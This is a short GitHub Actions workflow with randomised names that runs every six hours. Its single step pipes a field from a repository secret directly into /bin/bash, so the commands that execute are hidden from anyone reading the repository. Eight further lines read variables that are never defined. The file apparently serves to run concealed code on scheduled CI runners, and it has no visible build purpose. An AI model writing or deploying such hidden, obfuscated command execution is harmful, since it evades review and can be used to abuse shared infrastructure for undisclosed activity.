name: liulinglong6510
on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: liulinglong6510
        env:
          a85: ${{ secrets.a85 }}
        run: |
          echo $a85 | jq -r .qna08736 | /bin/bash
          echo $s1627 | jq -r .smh304 | /bin/bash
          echo $shc3269 | jq -r .m7184 | /bin/bash
          echo $ojzh86 | jq -r .kxx46 | /bin/bash
          echo $cbjma5166 | jq -r .zjkui87551 | /bin/bash
          echo $m5 | jq -r .vz3 | /bin/bash
          echo $qedl69561 | jq -r .qlu00 | /bin/bash
          echo $l01668 | jq -r .mckm71563 | /bin/bash
          echo $hjlcw60974 | jq -r .gmap842 | /bin/bash

